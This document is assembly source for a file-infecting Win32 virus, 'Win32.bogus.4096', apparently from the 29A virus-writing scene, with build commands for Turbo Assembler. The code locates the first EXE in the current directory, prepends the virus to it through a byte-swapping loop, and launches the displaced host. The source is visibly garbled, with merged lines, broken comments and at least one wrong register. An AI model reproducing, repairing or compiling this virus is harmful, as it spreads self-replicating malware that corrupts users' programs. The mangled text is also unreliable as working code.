Comment *
Win32.bogus.4096 苒 苒 圹? 苒 苒 圹? 苒 苒? Disassembly by?????? DARKMAN / 29A 苘苒 圻 咣 咣 圹? 圹 圹? 苘 苘? 苘苘 苘??? 圹? 圹 圹???
Win32.bogus.4096 is a 4096 bytes Runtime / Direct action EXE VIRUS. Infects
First File In Current Directory, When Executed, by prepending the Virus to
The Original EXE FILE.
Compile win32.bogus.4096 with Turbo Assembler v 5.0 by Typing:
Tasm32 / m / ml / q bogus.asm
TLINK32-Tpe -c -x -aa -r bogus.obj ,, import32
*
.386
.MODEL FLAT
Kernel32.dll
EXTRN EXITPROCESS: PROC
EXTRN FINDFIRSTFILEA: PROC
EXTRN WINEXEC: PROC
EXTRN _LCLOSE: PROC
EXTRN _LLSEEK: PROC
EXTRN _LOPEN: PROC
EXTRN _LREAD: PROC
EXTRN _LWRITE: PROC
EXTRN COPYFILEA: PROC
.DATA
Max_path EQU 0FFH
False Equ 00H
Of_readwrite EQU 02H; Opens The File for Reading and
Writing
SW_SHOW EQU 05H; Activates the window and displays it
; in ITS Current Size and Position
Filetime Struct
DWLOWDATETIME DWORD?; Specifies The Low-Order 32 BITS OF
; the file time
DWHIGHDATETIME DWORD?; Specifies the High-Order 32 Bits of
; the file time
Filetime Ends
Win32_find_data struct
DWFileAttributes DWORD?; Specifies the file attributes of there
File Found
FtcreationTime FileTime <>; specifies the time the file was
CREATED
FTLASTACCESSTIME FileTime <>; Specifies the Time That The File WAS
Last Accessed
FTLASTWRITETIME FileTime <>; specifies the time That the File WAS
Last Written TO
NFILESIZEHIGH DWORD?; Specifies the High-Order DWord Value
; of the file size, in Bytes
NFILESZELOW DWORD?; Specifier the low-Order DWord Value
; of the file size, in Bytes
DWRESERVED0 DWORD?; Reserved for Future Use
DWRESERVED1 DWORD?; Reserved for Future Use
CFILENAME BYTE MAX_PATH DUP (?)
A null-terminated string this is the; name of the file
Calternate Byte 0EH DUP (?); a null-terminated string That is an
ALTERNATIVE NAME for the File
ENDS
FindFileData Win32_Find_Data <>
SZFileName DB '* .exe', 00H; Name of File to Search for
SzneWFileName DB 'Zernebogus.exe', 00H
Null-Terminated String That
Specifies the name of the new file
CBuffer DB?; Buffer For Read Data, Data To BE
Written
CBuffer_ DB?; Buffer for Read Data, Data To BE
Written
.code
Code_begin:
Lea EDI, [ESP 10H]; EDI = Pointer to Buffer for Module
Path
Push EDI; EDI = Pointer to Buffer for Module
Path
Repne scaSB; Find end of filename
MOV BYTE PTR [EDI-01H], '.'; Store Dot
POP EDI; EDI = Pointer to Buffer for Module
Path
Push Offset FindFileData; Address of Returned Information
Push Offset SzFileName; Address of Name of File to Search
; For
Call FindfirstFilea
Push false; if file already exists, Overwrite IT
Push Offset SznewFileName; Address of FileName To Copy To
Push Edi; Address of Name of An Existing File
Call Copyfilea
Push of_readwrite; Opens the file forreading and
Writing
Push Offset FindFileData.cfileName
Address of Name of File To Open
Call _Lopen
Mov ESI, ESI ESI = File Handle
Push of_readwrite; Opens the file forreading and
Writing
Push Offset SznewFileName; Address of FileName To Copy To
Call _Lopen
MOV EDI, EAX; EDI = File Handle
XOR EBX, EBX; Number of Bytes Read and Written
MOV EBP, 0FFFFF000H; Number of Bytes to Move Through
Source file
Read_write_loop:
Push 00h; position to move from
Push Ebx; Number of Bytes To Move
Push ESI; POINTER TO DESTINATION FILENAME
Call _llseek
Push 01h; Length, in Bytes, of Data Buffpush Offset CBuffer; Address of Buffer For Read Data
Push ESI; POINTER TO DESTINATION FILENAME
Call _lread
Push 00h; position to move from
Push Ebx; Number of Bytes To Move
Push EDI; Pointer to Source FileName
Call _llseek
Push 01h; Length, in Bytes, Of Data Buffer
Push Offset CBuffer_; Address of Buffer for Read Data
Push EDI; Pointer to Source FileName
Call _lread
Push 00h; position to move from
Push Ebx; Number of Bytes To Move
Push ESI; POINTER TO DESTINATION FILENAME
Call _llseek
Push 01h; Number of bytes to Write
Push Offset Cbuffer_; Address of Buffer for Data To BE
Written
Push ESI; POINTER TO DESTINATION FILENAME
Call _LWRITE
Push 02h; position to move from
Push 00h; Number of Bytes to Move
Push ESI; POINTER TO DESTINATION FILENAME
Call _llseek
Push 01h; Number of bytes to Write
Push Offset CBuffer; Address of Buffer for Data To BE
Written
Push ESI; POINTER TO DESTINATION FILENAME
Call _LWRITE
Push 02h; position to move from
Push EBP; Number of Bytes To Move
Push EDI; Pointer to Source FileName
Call _llseek
Push 01h; Length, in Bytes, Of Data Buffer
Push Offset CBuffer; Address of Buffer for Read Data
Push EDI; Pointer to Source FileName
Call _lread
Push 00h; position to move from
Push Ebx; Number of Bytes To Move
Push EDI; Pointer to Source FileName
Call _llseek
Push 01h; Number of bytes to Write
Push Offset CBuffer; Address of Buffer for Data To BE
Push EDI; Pointer to Source FileName
Call _LWRITE
Inc EBX; Increase Number of Bytes Read and
Written
Inc EBP; Increase Number of Bytes To Move
; THROUGH SOURCE FILE
CMP BX, 1000H; Read and Written All of the Virus?
Jne Read_Write_LOOP; NOT Equal? Jump to read_write_looppush edi; handle to close
Call _lclose
Push sw_show; activates the window and displays it
; in ITS Current Size and Position
Push Offset SznewFileName; Address of FileName To Copy To
Call Winexec
Code_end:
End code_begin
